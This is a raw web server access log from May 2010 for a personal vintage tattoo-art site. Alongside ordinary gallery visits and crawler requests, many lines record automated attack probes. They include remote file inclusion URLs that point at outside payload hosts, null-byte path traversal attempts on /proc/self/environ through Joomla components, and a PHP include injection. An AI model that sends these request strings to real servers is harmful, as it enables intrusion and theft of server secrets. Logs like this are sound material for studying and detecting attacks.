88.74.31.35 - - [11/May/2010:02:31:43 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:31:43 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:31:43 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:31:43 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:31:44 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:31:44 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:31:44 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:31:44 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:02 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:03 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:04 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:28 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:28 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:28 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:28 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:28 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:28 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:28 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:28 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:29 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:29 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:29 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:47 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:47 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:47 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
88.74.31.35 - - [11/May/2010:02:32:47 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
207.46.204.189 - - [11/May/2010:02:35:09 -0500] "GET /logs/access_log.1236643200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.103.220.36 - - [11/May/2010:02:37:05 -0500] "GET /index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.29.80.127 - - [11/May/2010:02:37:28 -0500] "GET /index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [11/May/2010:02:38:14 -0500] "GET /logs/access_log.1236470400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.225.170.200 - - [11/May/2010:02:39:40 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
194.108.112.112 - - [11/May/2010:02:40:15 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.50.85.15 - - [11/May/2010:02:40:28 -0500] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?site_uk=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.50.85.15 - - [11/May/2010:02:40:28 -0500] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?site_uk=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.50.85.15 - - [11/May/2010:02:40:28 -0500] "GET /logs/access_log.1262822400/administrator/components/com_wmtgallery/admin.wmtgallery.php?site_uk=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
217.172.150.13 - - [11/May/2010:02:40:32 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
217.169.241.213 - - [11/May/2010:02:40:52 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.13.52 - - [11/May/2010:02:46:41 -0500] "GET /logs/access_log.1195084800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.50.189.221 - - [11/May/2010:02:47:24 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [11/May/2010:02:50:07 -0500] "GET /logs/access_log.1269216000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:02:50:36 -0500] "GET /logs/access_log.1231891200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.225.170.200 - - [11/May/2010:02:55:57 -0500] "GET /logs/access_log.1231718400/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:02:55:58 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:02:55:58 -0500] "GET /logs/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:02:56:37 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.225.170.200 - - [11/May/2010:02:56:39 -0500] "GET /logs/access_log.1227484800/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:02:58:55 -0500] "GET /logs/access_log.1227484800/index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:02:58:56 -0500] "GET /index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:02:58:56 -0500] "GET /logs/index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
91.103.220.36 - - [11/May/2010:03:00:34 -0500] "GET /logs/access_log.1227484800/index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:03:00:34 -0500] "GET /index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:03:00:35 -0500] "GET /logs/index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.29.80.127 - - [11/May/2010:03:01:40 -0500] "GET /logs/access_log.1231718400/index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.103.220.36 - - [11/May/2010:03:02:42 -0500] "GET /logs/access_log.1231718400/index.php?dept=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
114.108.177.125 - - [11/May/2010:03:04:28 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.177.125 - - [11/May/2010:03:04:29 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [11/May/2010:03:04:30 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.217.229.185 - - [11/May/2010:03:04:33 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [11/May/2010:03:04:33 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [11/May/2010:03:04:34 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [11/May/2010:03:04:34 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [11/May/2010:03:04:34 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [11/May/2010:03:04:34 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
217.172.150.13 - - [11/May/2010:03:07:38 -0500] "GET /logs/access_log.1227484800/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:03:07:39 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:03:07:39 -0500] "GET /logs/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
87.250.255.243 - - [11/May/2010:03:08:46 -0500] "GET /logs/access_log.1259107200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.177.125 - - [11/May/2010:03:08:48 -0500] "GET /logs/access_log.1273190400/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
114.108.177.125 - - [11/May/2010:03:08:48 -0500] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
114.108.177.125 - - [11/May/2010:03:08:49 -0500] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
194.108.112.112 - - [11/May/2010:03:09:25 -0500] "GET /logs/access_log.1227484800/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:03:09:26 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:03:09:26 -0500] "GET /logs/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.169.241.213 - - [11/May/2010:03:09:33 -0500] "GET /logs/access_log.1231718400/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:03:09:33 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:03:09:33 -0500] "GET /logs/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.172.150.13 - - [11/May/2010:03:10:35 -0500] "GET /logs/access_log.1231718400/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.825"
217.169.241.213 - - [11/May/2010:03:11:03 -0500] "GET /logs/access_log.1227484800/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:03:12:06 -0500] "GET /logs/access_log.1231718400/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:03:12:06 -0500] "GET /index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:03:12:08 -0500] "GET /logs/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
194.108.112.112 - - [11/May/2010:03:12:54 -0500] "GET /logs/access_log.1231718400/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.50.189.221 - - [11/May/2010:03:13:26 -0500] "GET /logs/access_log.1227484800/index.php?dept=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:03:16:27 -0500] "GET /logs/access_log.1181260800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.35.234 - - [11/May/2010:03:16:43 -0500] "GET /logs/access_log.1272067200%20%20/news.php?action=http://dozo.rgr.jp/ping/.../com_sef/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:03:16:53 -0500] "GET /logs/access_log.1242604800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.1.47.47 - - [11/May/2010:03:17:09 -0500] "GET //components/com_smf/smf.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.1.47.47 - - [11/May/2010:03:17:09 -0500] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:03:17:46 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:03:17:46 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:03:17:46 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.218.116.165 - - [11/May/2010:03:22:22 -0500] "GET /logs/access_log.1216684800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
174.121.77.90 - - [11/May/2010:03:22:45 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.150.224.151 - - [11/May/2010:03:22:46 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
174.136.55.175 - - [11/May/2010:03:22:51 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
80.88.16.30 - - [11/May/2010:03:22:55 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.826"
207.46.199.43 - - [11/May/2010:03:23:11 -0500] "GET /logs/access_log.1234828800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.165 - - [11/May/2010:03:23:44 -0500] "GET /logs/access_log.1236729600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [11/May/2010:03:25:28 -0500] "GET /artwork/txt.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:03:28:00 -0500] "GET /logs/access_log.1210982400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
110.32.142.155 - - [11/May/2010:03:28:15 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com.au/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=11&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26client%3Dfirefox-a%26sa%3DX%26rls%3Dorg.mozilla:en-US:official%26channel%3Ds%26tbs%3Disch:1""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
110.32.142.155 - - [11/May/2010:03:28:15 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
110.32.142.155 - - [11/May/2010:03:28:18 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
110.32.142.155 - - [11/May/2010:03:28:18 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
110.32.142.155 - - [11/May/2010:03:28:21 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
110.32.142.155 - - [11/May/2010:03:28:24 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
124.217.229.185 - - [11/May/2010:03:34:03 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
91.103.220.36 - - [11/May/2010:03:38:36 -0500] "GET //contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.29.80.127 - - [11/May/2010:03:38:36 -0500] "GET //contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.169.241.213 - - [11/May/2010:03:38:59 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.225.170.200 - - [11/May/2010:03:39:05 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
194.108.112.112 - - [11/May/2010:03:39:13 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.172.150.13 - - [11/May/2010:03:39:13 -0500] "GET //contenido.php?sec=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
91.103.220.36 - - [11/May/2010:03:39:39 -0500] "GET /logs//contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:03:39:39 -0500] "GET //contenido.php?sec=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
114.108.177.125 - - [11/May/2010:03:40:47 -0500] "GET /logs/access_log.1272067200/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
114.108.177.125 - - [11/May/2010:03:40:53 -0500] "GET /logs/access_log.1272067200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
78.0.242.178 - - [11/May/2010:03:42:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
